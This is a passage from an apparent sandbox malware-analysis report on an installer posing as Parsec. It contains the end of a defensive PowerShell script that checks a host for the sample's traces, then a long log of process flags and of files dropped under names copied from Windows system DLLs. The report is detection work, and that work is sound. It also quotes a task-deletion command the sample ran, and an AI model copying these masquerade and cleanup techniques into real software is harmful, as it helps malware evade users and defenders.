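$runOnce = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -ErrorAction SilentlyContinue
if ($runOnce -and $runOnce.PSObject.Properties['GrpConv']) {
    Add-Finding 'RunOnce' "GrpConv = $($runOnce.GrpConv)" 'Low signal alone; routine for driver installs'
}

# 3. Scheduled task: the sample ran "schtasks /delete /tn ParsecTeams /f". Its absence
#    is therefore the expected state after a full run; its presence means a partial run.
$task = Get-ScheduledTask -TaskName 'ParsecTeams' -ErrorAction SilentlyContinue
$state = if ($task) { 'present' } else { 'absent' }
Add-Finding 'ScheduledTask' "ParsecTeams $state" 'Report shows the task being deleted'

# 4. Start Menu shortcut, service binary and the Inno Setup staging directory.
$paths = @(
    'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnk',
    'C:\Program Files\Parsec\pservice.exe',
    (Join-Path $env:APPDATA 'PSecWin')
)
foreach ($p in $paths) {
    if (Test-Path $p) { Add-Finding 'File' $p 'Path taken from the report' }
}

# 5. Dropped drivers: the sample itself is unsigned, but a kernel driver must carry a
#    valid signature to load, so check Authenticode on whatever landed in the DriverStore.
Get-ChildItem 'C:\Windows\System32\DriverStore\FileRepository' -Recurse -ErrorAction SilentlyContinue `
    -Include 'parsecvusba.sys', 'parsecvirtualds.sys' |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(no signer)' }
        Add-Finding 'Driver' "$($_.FullName) [$($sig.Status)] $subject" 'Unsigned or untrusted status here is the real finding'
    }

$findings | Format-Table -AutoSize -Wrap
```

Treat a hit on the service keys, the driver files or the PSecWin directory as confirmation; treat the RunOnce value and the NOOPENFILEERRORBOX entries as context only.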

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\drvinst.exe -> File opened: NULL (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (11 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe -> Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe -> Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\taskkill.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe -> Process information set: NOOPENFILEERRORBOX (6 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe -> Process information set: NOOPENFILEERRORBOX (6 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe -> Process information set: NOOPENFILEERRORBOX (6 occurrences)
Source: C:\Program Files\Parsec\pservice.exe -> Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe -> Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe -> Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe -> Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe -> Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Windows\System32\drvinst.exe -> Process information set: NOOPENFILEERRORBOX (40 occurrences)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe -> Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\System32\drvinst.exe -> Process information set: NOOPENFILEERRORBOX (41 occurrences)
Source: C:\Windows\System32\runonce.exe -> Process information set: NOOPENFILEERRORBOX (11 occurrences)
Source: C:\Windows\System32\grpconv.exe -> Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\System32\drvinst.exe -> Process information set: NOOPENFILEERRORBOX (10 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe -> Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe -> Code function 49_2_00007FF763C04DD0: SetupDiGetClassDevsW, SetupDiEnumDeviceInfo, SetupDiGetDeviceRegistryPropertyW, GetLastError, GetLastError, LocalFree, LocalAlloc, SetupDiGetDeviceRegistryPropertyW, GetLastError, SetupDiGetDeviceRegistryPropertyW, GetLastError, GetLastError, LocalFree, LocalAlloc, SetupDiGetDeviceRegistryPropertyW, GetLastError, SetupDiGetDeviceRegistryPropertyW, GetLastError, GetLastError, LocalFree, LocalAlloc, SetupDiGetDeviceRegistryPropertyW, GetLastError, SetupDiBuildDriverInfoList, SetupDiEnumDriverInfoW, SetupDiEnumDeviceInfo, GetLastError, SetupDiDestroyDeviceInfoList, SetLastError, _invalid_parameter_noinfo_noreturn (12 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe -> Window found: window name: WSH-Timer (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MGUI8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-NRIH7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CEDA5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-P56QD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmp
Source: C:\Windows\System32\drvinst.exe -> Dropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)
Source: C:\Windows\System32\drvinst.exe -> Dropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE85A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-H8DB6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PBFIO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-G4CQT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-QSA3H.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe -> Dropped PE file which has not been started: C:\Program Files\Parsec\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-DQG3S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BUN5H.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-USCFG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-ULHI4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-UI7FB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-8G60N.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-K5NEU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HI4IL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HA8AR.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\teams.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-H42SM.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-O0GNS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-N73AH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-JRFAI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-L6U16.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BK2QC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PGRCJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-IJKK2.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-9HECR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MHHB2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BOVF1.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HCV6V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-I39R4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-G92OK.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HQ9KB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dllJump to dropped file
